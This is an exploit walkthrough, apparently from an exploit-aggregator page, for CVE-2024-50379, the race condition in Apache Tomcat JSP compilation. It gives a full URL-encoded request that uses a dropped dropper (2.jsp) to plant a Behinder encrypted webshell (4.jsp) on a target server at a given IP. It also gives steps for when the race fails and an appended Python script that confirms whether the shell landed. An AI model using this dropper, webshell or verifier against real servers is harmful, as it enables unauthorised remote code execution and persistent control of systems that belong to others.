## https://sploitus.com/exploit?id=2666ADB9-9A8B-59E9-85B8-22B7F336AE7E
# CVE-2024-50379
Exploiting CVE-2024-50379, the Apache Tomcat TOCTOU race in JSP compilation. It only applies when the default servlet is write-enabled (readonly=false, which is not the default) on a case-insensitive file system, so that a file uploaded under concurrent load can be treated as a JSP.
CVE-2024-50379.py and upload.txt must sit in the same directory.
upload.txt holds the webshell payload.
In this case the payload in upload.txt produces a file named 2.jsp, a small dropper that takes a target file name in the parameter f and the file content in the parameter t.
Through 2.jsp you can then create a new 4.jsp containing a stock Behinder (冰蝎) shell:
2.jsp?f=4.jsp&t=%3c%25%40%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%78%2e%63%72%79%70%74%6f%2e%2a%2c%6a%61%76%61%78%2e%63%72%79%70%74%6f%2e%73%70%65%63%2e%2a%22%25%3e%3c%25%21%63%6c%61%73%73%20%55%20%65%78%74%65%6e%64%73%20%43%6c%61%73%73%4c%6f%61%64%65%72%7b%55%28%43%6c%61%73%73%4c%6f%61%64%65%72%20%63%29%7b%73%75%70%65%72%28%63%29%3b%7d%70%75%62%6c%69%63%20%43%6c%61%73%73%20%67%28%62%79%74%65%20%5b%5d%62%29%7b%72%65%74%75%72%6e%20%73%75%70%65%72%2e%64%65%66%69%6e%65%43%6c%61%73%73%28%62%2c%30%2c%62%2e%6c%65%6e%67%74%68%29%3b%7d%7d%25%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%4d%65%74%68%6f%64%28%29%2e%65%71%75%61%6c%73%28%22%50%4f%53%54%22%29%29%7b%53%74%72%69%6e%67%20%6b%3d%22%65%34%35%65%33%32%39%66%65%62%35%64%39%32%35%62%22%3b%2f%2a%e5%c6%a5%3a%de%a5%c6%01%33%32%4d%6d%64%35%3c%84%4d%31%36%4d%0c%d8%a4%de%a5%c6%01%72%65%62%65%79%6f%6e%64%2a%2f%73%65%73%73%69%6f%6e%2e%70%75%74%56%61%6c%75%65%28%22%75%22%2c%6b%29%3b%43%69%70%68%65%72%20%63%3d%43%69%70%68%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%22%41%45%53%22%29%3b%63%2e%69%6e%69%74%28%32%2c%6e%65%77%20%53%65%63%72%65%74%4b%65%79%53%70%65%63%28%6b%2e%67%65%74%42%79%74%65%73%28%29%2c%22%41%45%53%22%29%29%3b%6e%65%77%20%55%28%74%68%69%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%43%6c%61%73%73%4c%6f%61%64%65%72%28%29%29%2e%67%28%63%2e%64%6f%46%69%6e%61%6c%28%6e%65%77%20%73%75%6e%2e%6d%69%73%63%2e%42%41%53%45%36%34%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%42%75%66%66%65%72%28%72%65%71%75%65%73%74%2e%67%65%74%52%65%61%64%65%72%28%29%2e%72%65%61%64%4c%69%6e%65%28%29%29%29%29%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%29%2e%65%71%75%61%6c%73%28%70%61%67%65%43%6f%6e%74%65%78%74%29%3b%7d%25%3e
Stop the Python script as soon as it reports a connection timeout or that the site cannot be reached.
Then visit
http://192.168.36.148:8080/2.jsp
and check whether it returns "seccess 2.jsp! seccess" (the marker the dropped shell prints, spelling included).
If the file exists but the response body is empty, the vulnerability is definitely there, but the concurrent requests overwrote the file before its content was written in. In that case try 1.jsp; if that is missing as well, re-run the script.
http://192.168.36.148:8080/1.jsp
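The manual checks above can be scripted. The following is an added example, not part of the original CVE-2024-50379.py or of upload.txt: it probes whether the default servlet accepts PUT at all (the readonly=false precondition) by uploading and deleting a throwaway .txt file, then fetches 2.jsp and 1.jsp and maps each response onto the outcomes described in the notes (marker present, file present but empty, file missing). The target URL, the "seccess" marker, the probe file name and the two candidate file names are assumptions taken from the notes; the transport is injectable so the decision logic can be exercised offline against canned responses. It does not run the race itself.

```python
# Added example (not the original exploit script): post-run verifier for the
# CVE-2024-50379 procedure in the notes above. Assumed: target base URL,
# the literal "seccess" marker printed by the dropped 2.jsp, and the
# candidate names 2.jsp / 1.jsp.
import secrets
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Sequence, Tuple

MARKER = "seccess"  # literal marker the dropped shell prints (typo is in the shell itself)

# transport(method, url, body) -> (status, response text). Injected so the
# classification logic can be tested offline with canned responses.
Transport = Callable[[str, str, Optional[bytes]], Tuple[int, str]]


def urllib_transport(method: str, url: str, body: Optional[bytes] = None,
                     timeout: float = 5.0) -> Tuple[int, str]:
    """Real HTTP transport. HTTP error codes are returned, not raised."""
    req = urllib.request.Request(url, data=body, method=method)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def default_servlet_writable(base: str, transport: Transport) -> bool:
    """Precondition probe: a default servlet with readonly=false accepts PUT.
    Upload a throwaway .txt (never a JSP), read it back, then delete it."""
    name = f"probe-{secrets.token_hex(4)}.txt"   # assumed probe name
    url = base.rstrip("/") + "/" + name
    token = secrets.token_hex(8).encode()
    status, _ = transport("PUT", url, token)
    if status not in (200, 201, 204):            # Tomcat answers 201/204 on success
        return False
    status, body = transport("GET", url, None)
    transport("DELETE", url, None)               # best-effort cleanup
    return status == 200 and body.strip() == token.decode()


def classify(status: int, body: str) -> str:
    """Map one GET of a dropped JSP onto the outcomes the notes describe."""
    if status == 404:
        return "missing"
    if status != 200:
        return f"http-{status}"
    if MARKER in body:
        return "landed"      # 2.jsp compiled, ran and printed its marker
    if body.strip() == "":
        return "empty"       # file exists but the race lost its content
    return "unexpected"


def verify(base: str, transport: Transport,
           names: Sequence[str] = ("2.jsp", "1.jsp")) -> Dict[str, str]:
    """Check the candidates in order, stopping at the first one that landed."""
    results: Dict[str, str] = {}
    for name in names:
        status, body = transport("GET", base.rstrip("/") + "/" + name, None)
        results[name] = classify(status, body)
        if results[name] == "landed":
            break
    return results


def decision(results: Dict[str, str]) -> str:
    """Turn the per-file outcomes into the next action from the notes."""
    outcomes = set(results.values())
    if "landed" in outcomes:
        return "shell landed"
    if "empty" in outcomes:
        return "vulnerable, content lost in race: re-run script"
    return "nothing landed: re-run script"


if __name__ == "__main__":
    target = "http://192.168.36.148:8080"   # target from the notes
    print("PUT allowed:", default_servlet_writable(target, urllib_transport))
    outcome = verify(target, urllib_transport)
    print(outcome, "->", decision(outcome))
```

The PUT probe deliberately uses a .txt name so the check itself never drops executable content; a 403 or 405 on the PUT means the default servlet is read-only and the race cannot be reached through this path.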